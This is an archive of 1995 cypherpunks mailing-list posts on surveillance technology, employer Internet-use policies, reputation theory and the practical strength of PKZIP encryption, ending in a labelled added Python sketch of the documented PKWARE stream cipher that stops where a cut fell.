> 1% of that, that is still 12,500 simultaneous conversations.
> That would seem to imply 12,500 people to listen to the tapes,
> right? Would that take agents off the streets?

On the other hand, if you only want to collect rough background
information about people who might become significant later, it is
enough to store the conversations in a computer (storage is orders of
magnitude cheaper than the man-time to listen to the tapes), and only
listen to the tapes if the person becomes interesting.

Besides, computer technology is approaching the point where you can
eliminate the human from the link entirely, except for final
verification.

1. Speech recognition already works quite well.  There was an article
about a 20.000 word speaker-independent system a few years ago,
operating 1/7th of real time on an alpha workstation.

2. Automatic speaker recognition from voice works quite well if my
understanding is correct.  (Useful for picking up interesting
conversations for further analysis when you get them from sources you
don't normally monitor).

3. Computers have been able to pick up potentially interesting
conversations by keywords for decades.  Also useful for picking up
interesting conversations for further analysis from sources you don't
monitor very actively.  (Of course, you can additionally use phone
numbers, mobile phone *phone* identification codes, etc.)

4. A lot of work is being done in classifying transcripts based on
their content, on message understanding.  In other words, a lot of the
analysis work can be automated now or in near future.  The computer
can then answer questions from the data and for example select
individuals for further analysis based on complex criteria.

5. A lot of work is being done on data mining (i.e., finding new data
from small pieces of individual data in a database, such as purchase
logs, etc.).  This is one of the hot topics in database conferences
right now.

6. Research is being done in massive databases.  There was an
Intelligence Community research initiative a couple of years ago on
massive databases; if my memory serves me right, they were talking
about 2-3 *petabytes* (10^12) as the size of the final database (no,
it was not gigabytes and it was not terabytes).  I believe I still
have the announcement saved somewhere if somebody wants it.


All of these technologies are feasible now or in near future.

Then add a little spices: the hundreds of thousands of surveillance TV
cameras around (did you know that there is a computer system that can
recognize and look up 25 faces per second from a database of a million
faces - used to control football hooligans and shoplifters for
instance, but has other uses as well), car movement records from
highway payment systems, purchase records obtained from
credit card companies, banks and retail chains, link up to medical
records, tax databases, employment records, etc.  Add full knowledge
of flight and other travel reservations, some fax, e-mail and telegram
intercepts.

Now, what have you got (besides effective tools for finding criminals)?

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 23 Nov 1995 09:36:51 +0800
To: Weld Pond <weld@l0pht.com>
Subject: Re: Pedophiles use encoding devices to make secret use of Internet
In-Reply-To: <Pine.BSD/.3.91.951121205509.15079A-100000@l0pht.com>
Message-ID: <199511220307.WAA18256@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Weld Pond writes:
> [ Pedophiles use encoding devices to make secret use of Internet ]
> Story in Nando Times
> 
> http://www2.nando.net/newsroom/ntn/info/info429_4.html

Somewhat inevitable. Doubtless it will be used by the FBI and others
as ammo.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 22 Nov 1995 13:23:12 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <199511210731.XAA08374@jobe.shell.portal.com>
Message-ID: <yo9XeD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice de Nonymous writes:
[dlv]
> > Fred is right. I used to work for Goldman Sachs & their internet usage
> > policy stated that when you write to Internet or Usenet from a GS account,
> > it will reflect on the firm no matter how you disclaim it.

[alice]
> I think this is true, and is where we start to get into reputations and
> trust.
>
> If someone from Goldman Sachs posts to a Usenet group discussing abortion
> or gun-control, and says that: "These opinions are my own and not my
> employers."  Then, we can accept that, no matter how silly their opinions
> are.

Unfortunately, most employers won't accept this. A couple of years ago Sun
Micro fired Philip Stromer for posting homophobic jokes to Usenet. A good
friend of mine was fired from Microsoft for sending politically incorrect
articles to a Ukrainian mailing list. (He was born in Ukraine.) Someone
complained to MS and he was axed. Interestingly, most of his offensive messages
came from his CompuServe account; only a couple of tamer ones were from his
microsoft.com address. The complainer and Microsoft apparently felt that since
he was known to work for Microsoft, it didn't matter that he posted mostly from
CompuServe.

I think Goldman's policy on Internet use is pretty reasonable. I'm attaching
at the end a couple of interesting e-mails that explain their philosophy.

> But there is a difference in the way we look at it if someone from Goldman
> Sachs posts to misc.invest.stocks instead and says that the Goldman Sachs
> Strip Coupon Fund is better than the one from Merrill Lynch -- that it's
> safer and produces higher returns because Goldman uses cubic spline
> interpolation methodologies to interpolate the yield curve, while Merrill
> Lynch doesn't.  There is a difference here.

Hmm... If it looks remotely like marketing, it'd better carry the usual
disclaimers that past returns are no indication of future returns etc. :)

> In the first case, the poster is not commenting about anything to do with
> their work, -- it really is just one man's opinion -- while in the second
> they are actually commenting upon something their employer is selling.

Even in the first case, the poster is using a Goldman e-mail address, which is
comparable to using Goldman stationery to write a personal letter. If he says
something pro- or anti-gun/abortion that might antagonize a potential client
and cause him not to do business with GS, then GS is right not to like this.

> If the employee tries to add, "these opinions are my own, and do not
> reflect the opinion of my employer" then we have a huge credibility
> problem.

I think these disclaimers are just silly and can't be taken seriously.
If he posted an article to alt.sex.pedophile discussing his desire to have
sex with children, surely this would reflect on Goldman no matter how he
disclaimed it, and he would deservedly be in trouble.

> You really can't have it both ways.  You can't post officially and
> unofficially at the same time, unless it really does have nothing to do
> with your work.

Goldman's policy seems to indicate that if you post from a commercial
ISP and don't claim to speak on behalf of Goldman, they don't care what
they say. This is better than some...

But consider this hypo. Joe Shmoe, an analyst with GS Research, posts an
article to misc.invest.* saying that he likes stock XYZZY. He posts from
another ISP and doesn't mention that he works for Goldman. But one of the many
kooks that invest misc.invest.* recognized Joe and shouts: *LOOK! THIS IS JOE
SHMOE FROM GS RESEARCH! *. At which point, the readers take Joe Shmoe's
postings much more seriously, and Goldman asks him whether he's put XYZZY on
the restricted list. (Disclaimer: I definitely don't speak for Goldman and am
just supposing what might happen in a situation like this :)

> If you post from Sun Engineering, and you are posting to a group that
> focuses on Sun, and you are talking about a Sun product, then people are
> going to take your comments as an official statement from Sun. You are
> that product's spokesperson, whether you disclaim or not, and should act
> accordingly.  No matter what, that's the way people are going to see it.

I would venture as far as to say that if you post from Netcom, but are known to
work for X, then you have much more credibility speaking about X's products or
future plans than some unknown person. Your reputation is thus both enhanced by
X and partially owned by X. X would be within its right to ask you not to speak
about X's affairs in public. The readers would have the right to assume that
you know more about X's affairs and decision-making than someone from the
street. Greater credibility carries with it greater responsibility, both to X
and to the readers. If you want a reputation that's independent from X, you
could get an ISP account under an assumed name, or post via an anonymous
remailer, and build a reputation from scratch.

Here are a couple of quotes regarding Goldman's Internet usage guidelines:

-----------------------------------------------------------------------------
Date: Wed, 10 May 1995 12:35:49 -0400
Resent-From: dimitry.vulis@nyapps01.gsam.gs.com (DLV)
From: Gary Schermerhorn <gary.schermerhorn@nyapps01.gsam.gs.com>
Subject: Internet GuideLines
To: gsamit@athena.fi.gs.com
Message-Id: <199505101635.MAA27299@nyapps01.gsam.gs.com>
Mime-Version: 1.0
X-Mailer: Z-Mail (3.2.0 06sep94)
X-Mailer: Mozilla/0.96 Beta (Windows)
Content-Type: text/plain;  charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Many of you have asked me for the firm's Internet Guidelines.  I have
attached them below.  Call me or Hans if you have any questions.

> [Image] Internet Access (including Internet mail)
>
>     ------------------------------------------------------------------------
>
> The Firm has clear policies on the appropriate usage of computer
> resources listed in a pamphlet entitled "The Keys To Information
> Security". This pamphlet is distributed to all new employees during
> their New Employee Orientation on the first day of employment. The
> policy in part:
>
>      Goldman Sachs' computers and software should be used for
>      business purposes only. Software and data created on Firm
>      systems or by Firm employees are the property of Goldman
>      Sachs. Only authorized use of the systems is permitted.
>
> You should be aware that unauthorized use of the systems may result in
> disciplinary action by the Firm, possibly including termination.
>
>     ------------------------------------------------------------------------
>
> Q: What does "for business purposes only" mean?
>
> A: It means that except for de minimis personal use, you should only
> use the Internet (including Mosaic and Internet mail) for tasks
> related to your job function.
>
>     ------------------------------------------------------------------------
>
> Q: Does this mean I cannot browse the Internet unless I know what I'm
> retrieving?
>
> A: The Internet is a resource beyond comprehension; even some of the
> Firm's veteran Internet surfers do not know about most of it. Browsing
> the Internet while looking for business-related resources is
> acceptable. Browsing the Internet with the intent of looking for
> non-business-related resources (such as the latest copy of Tetris) is
> not acceptable. Using the Internet to retrieve recreational pictures
> and other non-business items is not acceptable.
>
>     ------------------------------------------------------------------------
>
> Q: What if I have an Internet application I want to use that isn't
> currently supported?
>
> A: Consult with the Information Security group (unix@is.gs.com).
>
>     ------------------------------------------------------------------------
>
> Q: How does anyone know what I look at on the Internet?
>
> A: All Internet services leave an audit trail which is kept by the
> Information Security group. This logfile can be requested by your
> manager.
>
>     ------------------------------------------------------------------------
>
> Q: Why is the Firm concerned about Internet access?
>
> A: There is a charge to the Firm for the Internet use time. Other than
> de minimis personal use, non-business use constitutes theft of Firm
> property.
>
> In addition, many Internet applications (especially Mosaic) can
> potentially consume large amounts of network bandwidth. This has a
> significant impact upon your environment and can consume limited
> shared resources such as bandwidth and CPU. Heavy recreational usage
> of Internet services could consume bandwidth needed to deliver
> critical business data.
>
> Furthermore, certain accessed materials such as sexually-oriented
> materials may be offensive to others whom it is visible.
>
> Finally, when you send mail or news out to the Internet from a Firm
> system, you not only leave a trail throughout the Internet with the
> Goldman's name on it, but you also provide people on the Internet with
> an impression of Goldman, regardless of how you disclaim it. Plainly
> put, do not use the Internet (including email and news) for
> non-business related work.
>
>     ------------------------------------------------------------------------
>
> Q: How does this apply to Internet mail?
>
> A: Internet mail follows the same guidelines as Internet connections.
> You should not use Internet mail for purpose not related to your job
> function. One example of an appropriate usage would be for a system
> administrator to use a mailing list to learn more about a particular
> software package, such as Kerberos.
>
> An inappropriate use would be if you joined a list of bicyclists in
> the area and had that mail sent to your email account at work. Such
> mail is not related to your job-function (unless you happen to be the
> Goldman Investment Research Analyst assigned to bicyclists on the
> Information Superhighway).
>
>     ------------------------------------------------------------------------
>
> Q: So is it okay to correspond with clients through Internet mail?
>
> A: Communicating with clients is carefully controlled by the
> Compliance people in for your business unit. You should obtain the
> same internal approvals when sending email to clients over the
> Internet as you get when sending paper mail to them. If you have any
> questions, check with your Compliance person first; do not send email
> to a client with the intention of resolving these issues later.
>
>     ------------------------------------------------------------------------
>
> Q: What about Usenet news and mailing lists?
>
> A: When you post to Usenet news or send mail to a mailing list, you
> are providing an impression to the world of Goldman. Even if you
> "disclaim" what you are saying as "only your opinions", anything you
> say will continue to reflect on the Firm. Do not use news and mailing
> lists for personal or non-business purposes.
>
>     ------------------------------------------------------------------------
>
> Q: I really want to play with the Internet without all these
> constraints, what should I do?
>
> A: There are dozens of business that provide personal connections to
> the Internet for a very low cost (between $10 and $30 / month). If you
> want to explore the Internet, purchase a membership for one of the
> these services and explore the Internet on your own time, without
> using Firm computers or networks.
>
>     ------------------------------------------------------------------------
>
> Q: Where should I go if I have more questions?
>
> A: Your supervisor can help you determine what Internet resources may
> or may not be related to your job function.
>
>     ------------------------------------------------------------------------
>
> Unix Information Security Staff / webmaster@is.gs.com


-----------------------------------------------------------------------------
Date: Mon, 08 May 1995 12:09:27 -0400
From: Gary Schermerhorn <gary.schermerhorn@nyapps01.gsam.gs.com>
Subject: Internet Usage
To: gsam.all@athena.fi.gs.com
Message-Id: <9505081209.ZM11783@itpc01>
Mime-Version: 1.0
X-Mailer: ZM-Win (3.2.1 11Sep94)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7BIT

Just a reminder about Internet usage policy; Please read the 'Internet Access
Policy' statement, which is available on the GSAM Home page, or email me and I
will send you a copy.

ALL World Wide Web accesses are monitored against a list of known servers and
keywords which are understood to be inappropriate.  This list is available to me
each month.  You should all avoid Web access that will end up on this list.
Inappropriate use of the Web is equivalent to inappropriate phone usage (e.g.,
900 numbers).

Please read the Internet Access Guidelines.  Encourage your staff, particularly
new staff, to read them also.  The spirit of the guidelines is very clear.
Thanks.

--
Gary Schermerhorn                  (scherg@gsam.gs.com)
Goldman Sachs Asset Management
(212) 902-3344 (phone)
(212) 902-1384 (fax)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Wed, 22 Nov 1995 14:31:03 +0800
To: cypherpunks@toad.com
Subject: Re: PKZIP - Encryption
In-Reply-To: <Pine.A32.3.91.951122064257.46049A-100000@carmel.haifa.ac.il>
Message-ID: <199511220607.XAA12915@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



L. DEkel writes:

>
>     "Perry E. Metzger" writes:
> > I could see why one would want to use a weak encryption system if it
> > bought you something. However, good encryption systems are as cheap to
> > use as bad ones. Therefore, why ever use a bad one? If the top of the
> > line lock costs the same amount as a toy lock, why buy a toy?
> 
> There is the question of convenience (security=1/convenience - postulate),
> people don't like to pass their plaintext through several utils, where one
> compresses it, the other encrypts etc., they want a convenient util to use.

I think the point is that the postulate is true only because the people
who write "convenient" software usually either don't have a proper clue
about security or are afraid of crossing ITAR. Secure encryption algorithms
are intrinsically no less convenient than insecure ones. Quite the opposite,
from what I've seen: secure algorithms tend toward simplicity, because
it's easier to prove theorems with a simple algorithm than with a 
convoluted one. RC4 is a fine example of this, astonishingly uncomplicated.

It's as easy to drop IDEA into a compression/archiving utility as it is
to put in the dreaded "proprietary" algorithm. Easier. And if you don't want
to pay the licensing fees, use Blowfish or 3-DES. Why these companies don't
is anybody's guess. Take the example of StuffIt on the Mac, which
started out with DES and moved to some internally produced algorithm for
reasons no one at Aladdin has been willing to explain to me, even when
I asked with relative bluntness. Evidently, it was worth some trouble to
them to _reduce_ their security, of all things. That is a sad, sad 
situation. 

(No particular flame on Aladdin, other than the obvious technical one. They're
a fine bunch of folks, from my experience.)


                                  -- Will






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 22 Nov 1995 20:41:12 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: towards a theory of reputation
In-Reply-To: <199511212332.PAA24563@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951121223454.2539A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Nov 1995, Hal wrote:

> This is an interesting approach.  However this seems to fold in issues of
> reliability with issues of quality and value.  If I have a choice of two
> vendors, one of whom produces a product which is twice as good, but there
> is a 50% chance that he will abscond with my money, I am not sure how to
> value him compared with the other.  It seems like the thrust of the
> analysis later is to determine whether people will in fact try to
> disappear.  But that is not well captured IMO by an analysis which just
> ranks people in terms of "utility" for the price.

Our intuitive notion of reputation combines the issues of reliability and
quality.  In your example, whether you choose the reliable vendor or the
unreliable one depends on whether you are risk-seeking or risk-averse. 
You must prefer one or the other or be indifferent.  In general how you
make these choices depends on your values and your expectations of what the
vendors will do, which include both expectations of reliability and 
expectations of quality.

Can you elaborate more on why the analysis is inadequate?  (I know it 
probably isn't adequate, but why do you think so?)

> I am not sure about this last point.  It seems to me that a good
> reputation is one which is most cost-effective for its owner.  Whether it
> is good for social stability is not relevant to the person who is
> deciding whether to use it.  ("But what if everyone behaved that way?
> How would you feel then?")  It may be nice for the analyst but not for
> the participant.

Right, I'm speaking from the point of view of the analyst when I say
"good", but it also applies to individual participants.  Each person does
what he thinks is in his best interest, but if this turns out to be
unstable for the reputation system as a whole, then it won't last very
long so there is little point in getting involved in the first place.  In
other words, I would not choose to participate in an unstable reputation
system. 

> I don't really know what the first one means.  There are a lot of
> different ways I can behave, which will have impact on my reputation, but
> also on my productivity, income, etc.  There are other ways I can damage
> my reputation than by cheating, too.  I can be sloppy or careless or just
> not work very hard.  So the first two are really part of a continuum of
> various strategies I may apply in life.  The second is pretty clear but
> the first seems to cover too wide a range to give it a value.

You are right that there is a continuum of strategies, but I assume there is
a discontinuity between completely throwing away your reputation and any
other strategy.  So operating value is the maximum amount of profit you
can make by optimizing among all other strategies except disappearing. 

> It would be useful to make some of the assumptions a bit clearer here.
> Is this a system in which cheating is unpunishable other than by loss of
> reputation, our classic anonymous marketplace?  Even if so, there may be
> other considerations.  For example, cheating may have costs, such as
> timing the various frauds so that people don't find out and extricate
> themselves from vulnerable situations before they can get stung.  Also,
> as has been suggested here in the past, people may structure their
> interactions so that vulnerabilities to cheating are minimized, reducing
> the possible profits from that strategy.

When I wrote the original post I was thinking of the classic anonymous 
marketplace.  But I think it can apply to other types of markets.  
Cheating costs can be easily factored into the throw-away value, and 
an important question for any theory of reputation to answer is how 
to structure transactions to minimize this value.  Many more assumptions 
need to be made in modeling a particular reputation system, but I was 
trying to list some general properties that might apply to all reputation 
systems.

> It might be interesting to do something similar to Axelrod's Evolution
> of Cooperation, where (human-written) programs played the Prisoner's
> Dilemma against each other.  In that game, programs had reputations in
> a sense, in that each program when it interacted with another
> remembered all their previous interactions, and chose its behavior
> accordingly.  The PD is such a cut-throat game that it apparently
> didn't prove useful to try to create an elaborate reputation-updating
> model (at least in the first tournaments; I understand that in later
> versions some programs with slightly non-trivial complexity did well).

The tit-for-tat program that won both contests uses an extremely simple 
reputation algorithm -- it expects the next action of the other player 
to be the same as the last action.  This is an example of what I called a 
"good" reputation algorithm.  It serves the self-interest of the entities
that use it; it is cheap to use; when widely used the system is stable.

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 22 Nov 1995 16:41:31 +0800
To: "James A. Donald" <wjhalv1@PacBell.COM>
Subject: Re: towards a theory of reputation
In-Reply-To: <199511220523.VAA28300@blob.best.net>
Message-ID: <Pine.SUN.3.91.951121234629.2539B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 Nov 1995, James A. Donald wrote:

> Any attempt to discuss and analyze reputations using
> morally neutral language is bound to wind up as boring long
> winded meaningless complicated word salad.

I don't understand what you mean by this.  Can you give an example of how 
to discuss reputation (i.e., the concept of reputation, not a particular 
reputation) using morally non-neutral language?

William J. Halverson wrote:

> What is the difference between 'reputation' and 'value'?

When we say the value of some object, we implicitly assume that the 
quality of the information we used to evaluate the object is good enough 
that we don't have to deal with uncertainty.  When we speak of reputation 
however, we explicitly assume that we have less than perfect information 
and that uncertainties must be dealt with.  We normally speak of value of 
objects and reputation of entities, because information about objects is 
usually easier to obtain than information about entities.

> Why quantify it?  If Bob's advertising/testimonials are successful,
> he may not even have a 'reputation' because only insiders know
> about him.

Quantification is an abstraction that sometimes allows one to think about 
a concept more clearly.  You decide whether this is the case for 
reputation.

I don't completely understand your second sentence.  Only people who know 
that Bob exists have a reputation of him, so if only insiders know he 
exists, his reputation consists of the insiders' reputations of him.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 23 Nov 1995 07:58:12 +0800
To: cypherpunks@toad.com
Subject: Re: Junk E-Mail
Message-ID: <199511220939.BAA22898@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, James M. Cobb wrote:


> 11 21 95 The Electronic Telegraph reports: 
>  
>    THE European Parliament will decide today whether to 
>    ban junk mail. 

This is not surprising coming from the Europeans.  They tend to 
favour environmental conservation.

I believe that Germany mandates, as an example, that a manufacturing
company accept a return of its product for recycling at the cost of
the manufacturer.

Could you see GM or Ford actively supporting that type of program to
deal with the trash problem??



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 22 Nov 1995 18:45:56 +0800
To: cypherpunks@toad.com
Subject: Re: Mandarins, Lifers, and Talents
Message-ID: <199511221028.CAA25326@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Nov 1995, Lou Poppler wrote:

> Mandarins were involved in the genesis, certainly, both of our little 
> college network, and of the military's arpanet.  The mandarins provided
> our subsidies, and some of them found ways to use the net in doing their
> academic work.  Very many of them ignored us.  

Or tried their utmost best to ... until we came a knocking.

> Among us paid computer staff,
> the mandarins held occasional blue-sky meetings to plot the future and
> standards for the future; the lifers went about their business of feeding
> hollerith cards to the mainframes; and the talents immediately set about
> exploring this orthogonal new quirk of their machine.  All the edges were
> rough in the beginning, and for a long time after the beginning.  

Gee, I thought, err ... uhhm, shoot, aren't we still at the beginning??

Not the very beginning, but the beginning.

Wasn't all of the NII stuff simply a true mandarin plot^H^H^H^H
scheme^H^H^H^H^H^H contingency to get enough money to continue
"The Project" during some very lean budgetary years? 

Or am I behind in my reading again ...

> Network
> code arrived in huge inspired chunks from our eccentric talents.  Other
> talents, staff and user alike, would go out to play on the network and
> find little suggestions for the eccentric talents responsible.

All talents are by definition _irresponsible_.  They have to be in order
to take the risks, sometimes some very silly risks in hindsight. 

> I think the early networks were less than satisfying for the mandarins.

A satisfied mandarin??  Hmmm.  That'll take a couple of cycles to 
compute. ;-)

> It required arcane mandarin accounting schemes to rationalize our
> perpetual deficits, even in a 'funny money' accounting world.

Well, they've saved my butt (I think) when someone hung up the phone on
me. 

And for this, they've certainly got *some* of my allegiance.  ;-)

And they have my gratitude.

> Policies and standards were strained by the sudden accessibility of 
> the foreign operations, under alien chains of command.  The networks
> were immediately untidy and required compromise from the user.
> 
> The biggest contribution from the mandarins, and I mean this with 
> all gratitude, is that they chose, again and again, not to shut us down.

Chin. chin.

> ObCrypto: we were still getting the bugs out of rot13 back then.

Ahh, before they broke the code on what a baker's dozen REALLY was all
about.  Way back in the days when one-half was still working on rot12.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 22 Nov 1995 19:09:39 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security [NOISE]
Message-ID: <199511221048.CAA26409@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Nov 1995, Dr. Dimitri Vulis wrote:

> Hmm... If it looks remotely like marketing, it'd better carry the usual
> disclaimers that past returns are no indication of future returns etc. :)
> 
> >In the first case, the poster is not commenting about anything to do with
> >their work, -- it really is just one man's opinion -- while in the second
> >they are actually commenting upon something their employer is selling.

What I'm trying to say is that if someone posts from watson.ibm.com,
and IF they are talking about OS/2, we will not accept that they are
not speaking independently of the knowledge they have garnered from
watson.

It just doesn't work that way.

In the same way, someone who writes from Netscape.com or AT&T, or Sun
and tries to disclaim that they are speaking for the company, when
they step out as an employee of a company is deluding themselves.

When in the press have you seen a reporter claim as a source, an
"unnamed Senator"?



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

P.P.S.  I just sent email to Steve Bellovin from AT&T.  I thought I'd 
        settle the question once and for all, as to whether he IS 
        reading this mailing list or not.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Sam Kaplin)
Date: Wed, 22 Nov 1995 11:44:30 +0800
To: remailer-operators@c2.org
Subject: Syrinx Remailer is no more
Message-ID: <30b29639.13106184@popmail.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Effective immediately syrinx@c2.org is no more. I no longer have the
time to keep this remailer up and running. Perhaps somewhere down the
line I will set up another one. Please remove Syrinx from your chains.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. DEkel" <dekel@carmel.haifa.ac.il>
Date: Thu, 23 Nov 1995 09:51:58 +0800
To: cypherpunks@toad.com
Subject: PKZIP - Encryption
Message-ID: <Pine.A32.3.91.951122035639.51855A-100000@carmel.haifa.ac.il>
MIME-Version: 1.0
Content-Type: text/plain



                PKZIP Encryption - Practical approach
                =====================================

Note: I am discussing PKZIP ver. 2.xx encryption,
but the abstract isn't about a particular encryption.


ABSTRACT:

        Practical security often differs from Theoretical security.
If I asked you, would you make the effort of renting a box at the bank's safe
for putting only $1 inside, then when you want it you'll have to drive to town,
at opening hours, and be escorted by an armed guard to the safe, just to get
the $1, I can guess what your answer will be.
        The same thing goes for Cryptography, What you are trying to protect,
its importance, price, value, determines the steps you would be willing to take
to ensure a safe and strong encryption.
        If you want to hide a game from your kid brother, you can use some
basic algorithm of encryption (say XOR), but say you want to hide proofs that you
killed someone you better use a stronger algorithm (say IDEA).

To conclude: The system you should choose for security depends on:
1. How sensitive is the data you want to hide.
2. Who is the potential cracker of your system.
3. How convenient is the Crypto system for use. (*)
  (*) This is not so trivial, as security = 1/convenience, you can, for example
    force users to change their passwords every 2 min. very secure, but that's
    not very Practical.


PKZIP Encryption:

PKZIP encryption is often said to be: Weak, "a joke", "a deception" etc.
Maybe it's time to put things in the right perspective.

One must realize (yet again) the difference between:
Theoretical Cryptography - and - Practical Cryptography:

From the Theoretical side, there is an excellent article:
"A Known Plaintext Attack on the PKZIP Stream Cipher", by Eli Biham and
Paul C. Kocher, that proposes an attack on the algorithm using known plaintext
method. The writers come to the conclusion that: "The PKZIP cipher is weak,
and should not be used to protect valuable data".

Criticism:

0). Only you can define what is "valuable data" for yourself,
    this could be an abstract question.
    [see above ABSTRACT discussion]
1). The proposed attack is largely Theoretical, in "laboratory conditions",
whereas a ciphertext-only attack, more like what we often find in the real
world, is Harder.
The article doesn't propose any effective ciphertext-only attack.
(It seems the writers only tried to give a general assessment of the algorithm
strength, which they did very well).

Note: A Very limited Known-plaintext attack is possible against PKZIP,
as specific information about the Header of the archive file is Known,
but this attack is of complexity 2^38 or higher, so it's not very effective,
however it is possible for an expert Cryptanalyst. (This is still Easier
than ciphertext-only attack - we meet in the street).
        Thus, the theoretical attack is good in telling us about the encryption
algorithm, its strength and weaknesses, and knowledge is always better than
ignorance, But, in real world, such an attack can be rendered ineffective, or
impractical in terms of resources consumed, time spent, money etc.
        Don't get the wrong impression, in general, Cryptographic research is
Good, it helps determine the overall strength of an algorithm, make suggestions
as to possible improvements, warn against weak keys, back-doors etc. But we
must separate the Practical from the Theoretical, and it works both ways too.
        A one-time-pad (OTP) for example, is considered theoretically
unbreakable, but in practice OTP systems have been broken more than once, as
long as there are people making Human mistakes: losing secret keys, encrypting
a message with the OTP more than once, etc.
So: Theoretical encryption strength != Practical encryption Strength

2). Considering the "many" cracking utilities in the market:
there is almost NO ready-made software that really cracks the PKZIP algorithm
(crack = cryptanalysis, that is Really analyzing the algorithm, not guessing
games), in fact there is No software that can really crack Any modern
algorithm such as DES, IDEA etc, That is except maybe CBW which is the closest
thing to Really cracking the crypt(1) for unix, or some commercial products
for cracking WordPerfect encryption or so. (The strength of PKZIP 1.xx/2.xx
encryption is much greater than the above crypt(1) and WordPerfect).

        All the "Great" utilities are just fancy passwords guessers at best,
none of them analyze the ciphertext.
True, some of them are good guessers, but their "strength" depends on the
Weakness of the password (password = The cryptographic Key).
The stronger the password the less chance the "cracker-util" will crack it.
The best crackers in the market perform a "limited" brute force attack,
if they are good. "limited" is referred to "dictionary attacks", such as the
cracker doesn't perform a complete Keyspace (brute-force) search, instead it
performs a "Subset keyspace search", i.e. choosing some elements of the
Keyspace (say english words) and trying them. (There is the option, in some
crackers, including crackers for PKZIP, such as FZC, to perform a more
"ordered" Keyspace, that is checking sequences of Keys, e.g: All-5-uppercase
letters only- keys).
The conclusion from this section is, that if you choose a Long enough, Hard to
find (say random chars) password such as "x@J60!fv_Zd4%", then you are quite
safe from these "horrid" crackers.
That last statement is good for choosing passwords in general.

Final note:
PKZIP is not a crypto system it's an Archiver with a password protection 
option. If You want to protect your secret cherry cake recipe from your 
mother, you can safely use PKZIP protection (assuming your mother isn't a 
top cryptographer working for NSA). If you want to hide the formula for 
Cold fusion - use PGP.


And remember, there is always the "rubber hose" cryptography option.
,,,,,
DEkel
'''''
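
[Added example, not part of the original post and not PKWARE's code: a Python sketch of the traditional PKWARE stream cipher as documented in the ZIP APPNOTE, with the keyspace figures the post mentions put side by side in bits. It leaves out the archive container and the 12-byte encryption header; the 95-character alphabet and all function names are assumptions made for illustration.]

```python
import math

# CRC-32 table (reflected polynomial 0xEDB88320), the same table ZIP uses.
def build_crc_table():
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table

CRC_TABLE = build_crc_table()
STATE_BITS = 96  # three 32-bit keys


class ZipCrypto:
    """Traditional PKWARE stream cipher as described in the ZIP APPNOTE."""

    def __init__(self, password: bytes):
        # Fixed starting constants; the password is the only secret input.
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self._update(b)

    @staticmethod
    def _crc32(crc, byte):
        return (crc >> 8) ^ CRC_TABLE[(crc ^ byte) & 0xFF]

    def _update(self, plain_byte):
        self.k0 = self._crc32(self.k0, plain_byte)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = self._crc32(self.k2, self.k1 >> 24)

    def _keystream_byte(self):
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def state(self):
        return (self.k0, self.k1, self.k2)

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            out.append(p ^ self._keystream_byte())
            self._update(p)  # state advances on the plaintext byte
        return bytes(out)

    def decrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for c in data:
            p = c ^ self._keystream_byte()
            self._update(p)  # same update, using the recovered plaintext
            out.append(p)
        return bytes(out)


def keyspace_bits(alphabet_size: int, length: int) -> float:
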